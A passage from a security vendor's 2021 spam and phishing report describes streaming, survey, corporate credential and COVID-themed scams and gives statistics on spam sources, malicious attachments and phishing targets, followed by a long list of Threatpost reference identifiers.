website.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094149/Spam_report_2021_04.png>)\n\nHowever, the promised free stream would be interrupted before the film even got going. Visitors to the site would be shown a snippet of a trailer or a title sequence from one of the major film studios, which could have absolutely nothing to do with the film being used as bait. Visitors would then be asked to register on the website in order to continue watching. 
The same outcome was observed when users tried to download or stream sports events or other content, the only difference was visitors might not be able to watch anything without registering. Either way the registration was no longer free. The registration fee would only be a symbolic figure according to the information provided on the website, but any amount of money could be debited once the user had entered their bank card details, which would immediately fall into the hands of attackers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094211/Spam_report_2021_05.png>)\n\n### A special offer from cybercriminals: try hand at spamming\n\nMore and more often, scam websites posing as large companies that promise huge cash prizes in return for completing a survey have begun setting out stricter criteria for those who want a chance to win. After answering a few basic questions, "prize winners" are required to share information about the prize draw with a set number of their contacts via a messaging app. Only then is the victim invited to pay a small "commission fee" to receive their prize. This means the person who completes the full task not only gives the scammers money, but also recommends the scam to people in their list of contacts. Meanwhile, friends see the ad is from someone they know rather than some unknown number, which could give them a false sense of security, encouraging them to follow the link and part with their money in turn.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094234/Spam_report_2021_06.png>)\n\n### Hurry up and lose your account: phishing in the corporate sector\n\nThe main objective for scammers in an attack on an organization remained getting hold of corporate account credentials. 
The messages that cybercriminals sent to corporate e-mail addresses were increasingly disguised as business correspondence or notifications about work documents that required the recipient's attention. The attackers' main objective was to trick the victim into following the link to a phishing page for entering login details. That's why these e-mails would contain a link to a document, file, payment request, etc., where some sort of urgent action supposedly needed to be taken.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094310/Spam_report_2021_07.png>)\n\nThe fake notification would often concern some undelivered messages. They needed to be accessed via some sort of "email Portal" or another similar resource.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094341/Spam_report_2021_08.png>)\n\nAnother noticeable phishing trend targeting the corporate sector was to exploit popular cloud services as bait. Fake notifications about meetings in Microsoft Teams or a message about important documents sent via SharePoint for salary payment approval aimed to lower the recipient's guard and prompt them to enter the username and password for their corporate account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094433/Spam_report_2021_09.png>)\n\n### COVID-19\n\n#### Scams\n\nThe subject of COVID-19 which dominated newsfeeds throughout the entire year was exploited by scammers in various schemes. In particular, attackers continued sending out messages about compensation and subsidies related to restrictions imposed to combat the pandemic, as this issue remained top of the agenda. The e-mails contained references to laws, specific measures imposed and the names of governmental organizations to make them sound more convincing. To receive the money, the recipient supposedly just needed to pay a small commission fee to cover the cost of the transfer. 
In reality, the scammers disappeared after receiving the requested commission along with the victim's bank card details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094510/Spam_report_2021_10.png>)

The sale of fake COVID vaccination passes and QR codes became another source of income for cybercriminals. The fraudsters emphasized how quickly they could produce forged documents and personalized QR codes. These transactions are dangerous in two ways: on the one hand, the consequences can be criminal charges in some countries; on the other hand, scammers can easily trick the customer, as there's no guarantee that the code they're selling will work. A further risk is that the buyer has to reveal sensitive personal information to the dealer peddling the certificates in order to make the transaction.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094550/Spam_report_2021_11.png>)

#### The corporate sector

COVID-19 remained a relevant topic in phishing e-mails targeting the business sector. One of the main objectives of these mailing operations was to convince recipients to click a link leading to a fake login page and enter the username and password for their corporate account. Phishers used various ploys related to COVID-19. In particular, we detected notifications about compensation allocated by the government to employees of certain companies. All they needed to do in order to avail of this promised support was to "confirm" their e-mail address by logging in to their account on the scam website.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094621/Spam_report_2021_12.png>)

Another malicious mailshot utilized e-mails with an attached HTML file called "Covid Test Result".
Recipients who tried to open the file were taken to a scam website where they were prompted to enter the username and password for their Microsoft account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094648/Spam_report_2021_13.png>)

The "important message about vaccination" which supposedly lay unread in the recipient's inbox also contained a link to a page belonging to the attackers that requested corporate account details.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094709/Spam_report_2021_14.png>)

Another type of attack deployed e-mails with malicious attachments. Shocking news, such as immediate dismissal from work, accompanied by the need to take urgent action and read a "2 months salary receipt", was intended to make the recipient open the attachment containing the malicious object as quickly as possible.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094735/Spam_report_2021_15.png>)

#### COVID-19 vaccination

While authorities in various countries gradually rolled out vaccination programs for their citizens, cybercriminals exploited people's desire to protect themselves from the virus by getting vaccinated as soon as possible. For instance, some UK residents received an e-mail claiming to be from the country's National Health Service. In it, the recipient was invited to be vaccinated, having first confirmed their participation in the program by clicking on the link. In another mailing, scammers emphasized that only people over the age of 65 had the opportunity to get vaccinated.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094800/Spam_report_2021_16.png>)

In both cases, a form had to be filled out with personal data to make a vaccination appointment; and in the former case, the phishers also asked for bank card details.
If the victim followed all the instructions on the fake website, they handed their account and personal data over to the attackers.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094834/Spam_report_2021_17.png>)

Another way to gain access to users' personal data and purse strings was through fake vaccination surveys. Scammers sent out e-mails in the name of large pharmaceutical companies producing COVID-19 vaccines, or posing as certain individuals. The e-mail invited recipients to take part in a small study.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094909/Spam_report_2021_18.png>)

The scammers promised gifts or even monetary rewards to those who filled out the survey. After answering the questions, the victim would be taken to a "prize" page but told to pay a small "commission fee" in order to receive it. The scammers received the money, but the victim got nothing in return.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094931/Spam_report_2021_19.png>)

We also observed a mailing last year which exploited the subject of vaccination to spread malware. The subject lines of these e-mails were randomly selected from various sources. The attached document contained a macro for running a PowerShell script, detected as [Trojan.MSOffice.SAgent.gen](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>). SAgent malware is used at the initial stage of an attack to deliver other malware to the victim's system.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08094958/Spam_report_2021_20.png>)

## Statistics: spam

### Share of spam in mail traffic

On average, 45.56% of global mail traffic was spam in 2021.
The figure fluctuated over the course of the year.

_Share of spam in global e-mail traffic, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101352/01-en-spam-report-2021.png>))_

We observed the largest percentage of spam in the second quarter (46.56%), which peaked in June (48.03%). The fourth quarter was the quietest period (44.54%), with only 43.70% of e-mails detected as spam in November.

### Sources of spam by country or region

As in 2020, the most spam in 2021 came from Russia (24.77%), whose share rose by 3.5 p.p. Germany, whose share rose 3.15 p.p. to 14.12%, remained in second place. They were followed by the United States (10.46%) and China (8.73%), which also stayed put in third and fourth place. The share of spam sent from the United States barely moved, while China's rose 2.52 p.p. compared to 2020.

_Sources of spam by country or region in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101419/03-en-spam-report-2021.png>))_

The Netherlands (4.75%) moved up to fifth place, with its share rising by just 0.75 p.p. to overtake France (3.57%), whose share went in the opposite direction. Spain (3.00%) and Brazil (2.41%) also swapped places, and the top ten was rounded out by the same two countries as in 2020, Japan (2.36%) and Poland (1.66%). In total, over three quarters of the world's spam was sent from these ten countries.

### Malicious mail attachments

_Dynamics of Mail Anti-Virus triggerings in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101444/04-en-spam-report-2021.png>))_

In 2021, Kaspersky Mail Anti-Virus blocked 148 173 261 malicious e-mail attachments. May was the quietest month, when just over 10 million attachments were detected, i.e., 7.02% of the annual total.
In contrast, October turned out to be the busiest month, when we recorded over 15 million attacks blocked by the Mail Anti-Virus, i.e., 10.24% of the annual total.

#### Malware families

The attachments most frequently encountered and blocked by the antivirus in 2021 were Trojans from the [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) family, which steal login credentials stored in browsers as well as credentials from e-mail and FTP clients. Members of this family were found in 8.67% of the malicious files detected, which is 0.97 p.p. up on 2020. Second place was taken by [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) Trojans (6.31%), distributed in archives and disguised as electronic documents. In another 3.95% of cases, our products blocked attacks exploiting the [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) vulnerability in Microsoft Equation Editor, which remains significant for the fourth year in a row. Almost the same number of attachments belonged to the [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (3.93%), whose members create malicious tasks in Windows Task Scheduler.

_TOP 10 malware families spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101509/05-en-spam-report-2021.png>))_

The fifth and tenth most popular forms of malware sent in attachments were Noon spyware Trojans for [any version](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) of Windows OS (3.63%) and for [32-bit versions](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) only (1.90%), respectively. Malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images accounted for 3.21% of all attachments blocked, while SAgent Trojans contributed 2.53%.
Eighth place was taken by another exploited vulnerability in Equation Editor, [CVE-2018-0802](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2018-0802/>) (2.38%), while ninth place went to [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (1.95%), which are mainly used to deliver other types of malware to an infected system.

_TOP 10 types of malware spread by e-mail attachments in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101548/06-en-spam-report-2021.png>))_

The ten most common verdicts in 2021 coincided with the TOP 10 families. This means attackers mainly spread one member of each family.

#### Countries and regions targeted by malicious mailings

In 2021, the Mail Anti-Virus most frequently blocked attacks on devices used in Spain (9.32%), whose share has risen for the second year in a row. Russia rose to second place (6.33%). The third largest number of malicious files was blocked in Italy (5.78%).

_Countries and regions targeted by malicious mailshots in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101614/07-en-spam-report-2021.png>))_

Germany (4.83%) had been the most popular target in phishing attacks for several years until 2020. It dropped to fifth place in 2021, giving way to Brazil (4.84%), whose share was just 0.01 p.p. higher than Germany's. They were followed in close succession by Mexico (4.53%), Vietnam (4.50%) and the United Arab Emirates (4.30%), with the same two countries as in 2020 rounding out the TOP 10 targets: Turkey (3.37%) and Malaysia (2.62%).

## Statistics: phishing

In 2021, our Anti-Phishing system blocked 253 365 212 phishing links.
In total, 8.20% of Kaspersky users in different countries and regions around the world faced at least one phishing attack.

### Map of phishing attacks

_Geography of phishing attacks in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101643/08-en-spam-report-2021.png>))_

Users living in Brazil made the most attempts to follow phishing links, with the Anti-Phishing protection triggered on devices belonging to 12.39% of users in this country. Brazil was also the top phishing target in 2020. France rose to second place (12.21%), while Portugal (11.40%) remained third. It's worth noting that phishing activity was so rampant in France last year that the country topped the leaderboard of targeted users in the first quarter.

Mongolia (10.98%) found itself in fourth place for the number of users attacked in 2021, making it onto this list for the first time. The countries which followed in close succession were Réunion (10.97%), Brunei (10.89%), Madagascar (10.87%), Andorra (10.79%), Australia (10.74%), and Ecuador (10.73%).

TOP 10 countries by share of users targeted in phishing attacks:

**Country** | **Share of attacked users*** 
---|--- 
Brazil | 12.39% 
France | 12.21% 
Portugal | 11.40% 
Mongolia | 10.98% 
Réunion | 10.97% 
Brunei | 10.89% 
Madagascar | 10.87% 
Andorra | 10.79% 
Australia | 10.74% 
Ecuador | 10.73% 

_* Share of users on whose devices Anti-Phishing was triggered out of all Kaspersky users in the country in 2021_

### Top-level domains

As in 2020, most of the phishing websites blocked in 2021 used a .com domain name, whose share rose 7.19 p.p. to reach 31.55%. The second most popular domain used by attackers was .xyz (13.71%), as those domains are cheap or even free to register. The third row on the list was occupied by the Chinese country-code domain .cn (7.14%).
The Russian domain .ru (2.99%) fell to sixth place, although its share has grown since 2020. It now trails behind .org (3.13%) and .top (3.08%), and is followed by .net (2.20%), .site (1.82%), and .online (1.56%). The list is rounded out by the low-cost .tk domain (1.17%) belonging to the island nation of Tokelau, which attracts attackers for the same reason .xyz does.

_Most frequent top-level domains for phishing pages in 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101710/09-en-spam-report-2021.png>))_

### Organizations mimicked in phishing attacks

_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an e-mail message or on the web, as long as links to these pages are present in the Kaspersky database._

The demand for online shopping remained high in 2021, which is reflected in phishing trends: phishing pages were most frequently designed to mimic online stores (17.61%). These were closely followed by global Internet portals (17.27%) in second place. Payment systems (13.11%) climbed to third place, rising 4.7 p.p. to overtake banks (11.11%) and social networks (6.34%). Instant messengers (4.36%) and telecom companies (2.09%) stayed in sixth and seventh place, respectively, although both their shares fell. IT companies (2.00%) and financial services (1.90%) also held onto their places in the rating.
The TOP 10 was rounded out by online games (1.51%), as attackers went after gamers more frequently than after users of delivery services in 2021.

_Distribution of organizations most often mimicked by phishers, by category, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101743/10-en-spam-report-2021.png>))_

### Phishing in messengers

_Statistics on messenger-based phishing are based on anonymized data from the Safe Messaging component of Kaspersky Internet Security for Android, voluntarily provided by users of this solution. Safe Messaging scans incoming messages and blocks attempts to follow any phishing or otherwise malicious links in them._

In 2021, Safe Messaging blocked 341 954 attempts to follow phishing links in various messengers. Most of these were links that users tried to follow from WhatsApp (90.00%). Second place was occupied by Telegram (5.04%), with Viber (4.94%) not far behind.

_Distribution of links blocked by the Safe Messaging component, by messenger, 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08101811/11-en-spam-report-2021.png>))_

On average, WhatsApp users attempted to follow phishing links 850 times a day. We observed the least phishing activity at the beginning of the year, while in December the weekly number of blocked links exceeded the 10 000 mark. We observed a spike in phishing activity on WhatsApp in July, when Trojan.AndroidOS.Whatreg.b, which is mainly used to register new WhatsApp accounts, also became more active. We can't say for sure that there's a connection between Whatreg activity and phishing in this messaging app, but it's a possibility.
We also observed another brief surge in phishing activity in the week from October 31 through November 6, 2021.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100059/Spam_report_2021_21.png>)

**_Dynamics of phishing activity on WhatsApp in 2021 (weekly number of detected links shown)_**

On average, the Safe Messaging component detected 45 daily attempts to follow phishing links sent via Telegram. As with WhatsApp, phishing activity increased towards the end of the year.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100143/Spam_report_2021_22.png>)

**_Dynamics of phishing activity on Telegram in 2021 (weekly number of detected links shown)_**

A daily average of 45 links was also detected on Viber, although phishing activity on this messenger dropped off towards the end of the year. However, we observed a peak in August 2021.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/08100213/Spam_report_2021_23.png>)

**_Dynamics of phishing activity on Viber in 2021 (weekly number of detected links shown)_**

## Conclusion

As we had expected, the key trends of 2020 continued into 2021. Attackers actively exploited the subject of COVID-19 in spam e-mails, which remained just as relevant as it was a year earlier. Moreover, baits related to vaccines and QR codes, two of the year's main themes, were added to the bag of pandemic-related tricks. As expected, we continued to observe a variety of schemes devised to hack corporate accounts. To achieve their aims, attackers forged e-mails mimicking notifications from various online collaboration tools, sent out notifications about non-existent documents, and used similar business-related baits. There were also some new trends, such as the investment scam, which is gaining momentum.

The key trends in phishing attacks and scams are likely to continue into the coming year.
Fresh "investment projects" will replace their forerunners. "Prize draws" will alternate with holiday giveaways when there's a special occasion to celebrate. Attacks on the corporate sector aren't going anywhere either. Given that remote and hybrid working arrangements are here to stay, the demand for corporate accounts on various platforms is unlikely to wane. The topic of COVID-19 vaccination status will also remain relevant. Due to the intensity of the measures being imposed in different countries to stop the spread of the virus, we'll more than likely see a surge in the number of forged documents up for sale on the dark web, offering unrestricted access to public places and allowing holders to enjoy all the freedoms of civilization.

_Authors: Tatyana Kulikova, Tatyana Shcherbakova. Published: 2022-02-09. Source: <https://securelist.com/spam-and-phishing-in-2021/105713/>_
"THREATPOST:4F6F13C74BC6E5EC3C5FF0600F339C90", "THREATPOST:4FA617D4BE1CFDFB912E254229B94E61", "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "THREATPOST:5170E663982119D9A7AA4064EC71D01D", "THREATPOST:5196DBE4ABD34424DF1F07ED3DA73B12", "THREATPOST:519B278A52BA4200692386F6FAEA43B1", "THREATPOST:519EDC580FCA347C035738F51DB2ABE3", "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "THREATPOST:5223DD87C6EE62FB7C3723BCCF670612", "THREATPOST:537857B2E29A08953D50AC9EDE93162F", "THREATPOST:537A21C79E24E9981AD8200320B7D46F", "THREATPOST:542C0B0D14A54FEF96D5035E5ABEFEDF", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:55873F60362AA114632D0D7DC95FF63C", "THREATPOST:5679ACC257BEC35A3A300F76FA78E8E6", "THREATPOST:580280FBECF50DF8FF68F3A998F311D3", "THREATPOST:59732F848538CA26FD0A3AC638F529F9", "THREATPOST:59C4483705849ADA19D341EFA462DD19", "THREATPOST:5A63035EF0BF190E58422B3612EB679F", "THREATPOST:5B1F1A9A61354738E396D81C42C0E897", "THREATPOST:5BA927C1BD88B4949BDAEC1ACC841488", "THREATPOST:5C4C4351A746ADF8A7F1B2D316888C01", "THREATPOST:5C60BA94DEDFC24233F8B820C7D23076", "THREATPOST:5D03FA1B3C642C5317FB96AFA476DDFA", "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "THREATPOST:5DA1737F4321D42086053820C84CCFB0", "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "THREATPOST:619AA46DE90E000F02F634A9AA0FB8B0", "THREATPOST:61AC6ABD7798785567FFEEBEF573CDF8", "THREATPOST:61F350907297E5B2EBAE56FF04C054C7", "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "THREATPOST:63188D8C89FE469962D4F460E46755BC", "THREATPOST:632A7F4B404E8A9E7D49A4895D573FDB", "THREATPOST:639050E94B84AD3926F64EF305F67AB4", "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:64EE7E2569B19CDBC1F2000D27D9FC06", "THREATPOST:65B7931A3E49BA24F11CA0CB09743AEA", "THREATPOST:66D2F7851992FD5FC9934A5FE7A68E9F", "THREATPOST:68D1078BB418B06D989E65C3972EDE28", "THREATPOST:6968030EBEDCF665121F267E466D3BA5", 
"THREATPOST:69A935F9472525B2FDE94FC33D6C6B70", "THREATPOST:6B8C9E983349C1AA69D5488866DAAC1D", "THREATPOST:6B96C89C11F9A7363A1E592863892D36", "THREATPOST:6C3F577E27FFC413E4196C31436CE13A", "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "THREATPOST:6E46A05627B4B870228F4C53DD7811AE", "THREATPOST:6EBEA4CC58A28C7B7DEE65B4D6FDA976", "THREATPOST:70B08FC40DE9224ACE3D689EE22897C0", "THREATPOST:714DD68C5B32F675D9C75A67D7288B65", "THREATPOST:71D015FE251ED550B92792FF72430841", "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:75108516B2230B2FA175C2B84083F4DF", "THREATPOST:752864660896CF677AF67798E68952F0", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:7642BB12A1C6458D5DDB7202B6BF1D62", "THREATPOST:765141925BCF61E1BEC4EA2E7E28C380", "THREATPOST:769E9696F176FD575D7F365CA771EFC3", "THREATPOST:77E27FE5A07B4C4146B818CE438E0AAA", "THREATPOST:78B8BC1F232A077BA4B03580A37C0780", "THREATPOST:78CC95FFED89068ABD2CBA57EFE1D5F8", "THREATPOST:7957677E374E9980D5154F756D4A2E00", "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "THREATPOST:7ACEE8004906A83F73EF46D8EE9A83F3", "THREATPOST:7BE818C547990FA7A643DE9C0DE99C8C", "THREATPOST:7D0B88F224FD59AB5C49F030B02A25D9", "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "THREATPOST:7D30EC4B25275AFBC409D8619D125E65", "THREATPOST:7D43FDAB0FB38B20FBB86FFF6FD31270", "THREATPOST:7E30033E60118E5B4B8C14689A890155", "THREATPOST:7E324E4AFB9218DCC9509FB4E2277400", "THREATPOST:7F4C76F7EC1CB91B3A37DE64274F1EC3", "THREATPOST:7F86D903184A4B5AF689693F5950FB7D", "THREATPOST:7FF462EBFF86BEB1E7C8207D6CB07E50", "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "THREATPOST:80110ABE631D4720D6EECA161FFCE965", "THREATPOST:80978215EBC2D47937D2F3471707A073", "THREATPOST:809BED35A98A53099CE1EC723FA950F2", 
"THREATPOST:80D12F3888B999E484D206D5EBA9EEA0", "THREATPOST:828471E05035E11C0ED67C67E1EA8F0D", "THREATPOST:848870C5AD3BB637321291CEF571A5F9", "THREATPOST:8549E725CF51C109F7299A0CC5FACBE9", "THREATPOST:856DD01A5D951BB0E39AE06B64DDD2A7", "THREATPOST:85DCC5523A4DCF507633F07B43FE638A", "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "THREATPOST:8836AC81C1F2D9654424EC1584E50A16", "THREATPOST:88A5449B2DE22E7A3AD1C820BEDE1109", "THREATPOST:8A24910206DA1810DAD81ABA313E33A7", "THREATPOST:8BA8EF04040D5048287D9AFFAD778130", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:8D91C617AB6DA9813465DF309507F9F5", "THREATPOST:8E01B2E26F588D0FA5B0857DCEF926DA", "THREATPOST:8EC1069E3114E28911EA3438DA21B952", "THREATPOST:8F39618B0CB625A1C4FC439D0A7C4EB9", "THREATPOST:8FAA8C7C7378C070F0011A0B44C03726", "THREATPOST:8FACBD9A4509F71E19E07BB451FD68A0", "THREATPOST:90355E85731E1618F6C63A58CD426966", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:945830C59DF62627CC3D29C4F9E9139F", "THREATPOST:945A12FF5F8B6420706F2E174B6D0590", "THREATPOST:95C6723464FA4BDF541640AC24DD5E35", "THREATPOST:967CD2B765C5CD02EC0568E4797AF842", "THREATPOST:96B85F971B8102B581B91984548004F2", "THREATPOST:96C5FAF7B7238F498D3BFD523344AA56", "THREATPOST:9758835CBD1761636E1E39F36A79936B", "THREATPOST:9812AA10EEA208EA87CD37C5F28D927F", "THREATPOST:985009AC9680D632153D78707A8949EF", "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "THREATPOST:9AA382E93ED0C2124DD69CF4DDC84EB7", "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "THREATPOST:9B11E0EF22481CA407924C58E8C7F8C1", "THREATPOST:9B936E81D7DD33C962D98A85BAF3B7FE", "THREATPOST:9C03EBE552C67EF6E62604A81CF13C1A", "THREATPOST:9C0FA678FF748B08478CA83EAAEF83B4", "THREATPOST:9D048A14622014274EB5C5D19FEDD46A", "THREATPOST:9DAD31CF008CF12C5C4A4EA19C77BB66", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:9FE968913EDA58B2C622DFD4433C05E0", "THREATPOST:A054939E56572665B8DD31C2FF1D6A79", 
"THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "THREATPOST:A1A03F8D19A1212209F2765F29BE892C", "THREATPOST:A21BD1B60411A9861212745052E23AE7", "THREATPOST:A29172A6F4C253F7A464F05CCE4E3ABB", "THREATPOST:A2C4DFB7FD998E1990946FBDE70D8050", "THREATPOST:A2FCDF5F534EC09A258F3193FDEA41A8", "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "THREATPOST:A45F038EA4091EC6AC414522EC7B04B6", "THREATPOST:A60A7647981BC9789CAECE6E9BADD30E", "THREATPOST:A653527FBB893B6568AF6B264422BD7A", "THREATPOST:A6CEBF30D4D0B3B54DC8E78CC21EBA4B", "THREATPOST:A7710EFC5AA842A252861C862A3F8318", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:A7D014F320A68BD2D7BEA7FCB9349FC0", "THREATPOST:A824AE46654142C5CE71C8DDFD90D548", "THREATPOST:A844D1411E7339911EECDDBD5596A9E7", "THREATPOST:A959F2AFFE1161A65066EACCFB0D5FCA", "THREATPOST:A9E6DBBE61D0494D0B0C83151FEC45D0", "THREATPOST:A9EF092F5BA25CAD6C775AAE60BC318E", "THREATPOST:A9FAA9D15FCD97151072CF8CE16A42D9", "THREATPOST:AA7C9EFD06F74FBC5580C0384A39AA56", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:ABA04F8289071D7B10CAE4202D0EB18E", "THREATPOST:AC7105820BB83340E9C002EE77D4B8D6", "THREATPOST:AD20F9744EB0E2E4D282F681451B4FBD", "THREATPOST:AD3C2C361C6E263CA6B217D740D6C09F", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "THREATPOST:AE4AEC18802953FE366542717C056064", "THREATPOST:AE6ADD184BCB4B6C0DCF53BEE513E9DD", "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "THREATPOST:B1F3641CBE3AF60ECA85E3ADE7AE53CA", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B34044D3D29EE756187C0D5CDF2E19B8", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:B450AFC35B78A62F536227C18B77CB4E", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B4AED814955E51C42BAE9BF0A3A014B0", "THREATPOST:B4B23ADD1522DC53A0B05300F439AB03", "THREATPOST:B5B59F74FDFACADB44DBF4AE420E3189", "THREATPOST:B60886BC4FD09BD02903BB2C7FBD4A35", 
"THREATPOST:B62AA49BBB410F8D7406ABE4E3C4C62F", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:B71BC1DE86D81D6B48969567186B0622", "THREATPOST:B7280795B2A42655BE9618D06EB9520A", "THREATPOST:B7E1238E416DAB5F50EED6E4CC347296", "THREATPOST:B8B49658F96D885BA4DC80406A2A94B3", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BB432D74FB2DC755C74CBEE5CF71B1E9", "THREATPOST:BB95F65906A69148A31A208D15B5EFC3", "THREATPOST:BD9CDF08D7870033C1C564691CABFC16", "THREATPOST:BDA1752A66AD0D3CF8AB59CFB7A8F472", "THREATPOST:BDAFE3A8671CEAB24C02FF18A8FBA60F", "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "THREATPOST:BE68C6E4335F8D5EEAEFCE1E8553C4C8", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:C1850156F9F2124BACDC7601CCFA6B30", "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "THREATPOST:C442C6ABA3916CAA62C89BC2CB6332CD", "THREATPOST:C47E4314F4EEB30F0139DF3BC8B47E01", "THREATPOST:C4DD63E36CE4313386CAB54222BDD07A", "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "THREATPOST:C8BB08507CBCCE4C217C33C15D3AA04D", "THREATPOST:C9B3ABEF738D9A1E524FB94613BA5CBA", "THREATPOST:C9C5B1554A6F4216A73108C0748E16EF", "THREATPOST:CB62075A4B035B08FDA602FF702FBB71", "THREATPOST:CC82779FBE47FD3E64708FE6233C3DAD", "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "THREATPOST:CDDC2C11CF6377AB44508254B9FB36DA", "THREATPOST:D053D0BAA76AC62C5AFCB77CBFD61B6D", "THREATPOST:D11D4E32822220251B14068F9BAAD17E", "THREATPOST:D292185F5E299FDB7366DDAA750D6070", "THREATPOST:D3F6B40A3A2EF494FE7F0AFC7768F7CD", "THREATPOST:D40D286C87360AFDC61FCD9AD506D78F", "THREATPOST:D49075D6FFF077A542015B7F806F4E27", "THREATPOST:D4C8CD7D146990740B8339D88A3FDB84", "THREATPOST:D55054CEF7EC85590BCAC2F18EED6FFC", "THREATPOST:D587192A5DA9FB1680FF9D453F96B972", "THREATPOST:D58796CB8261B361ADF389131F955AE3", "THREATPOST:D5CE687F92766745C002851DFA8945DE", "THREATPOST:D6D859A31F73B00E9B6F642D4C89B344", 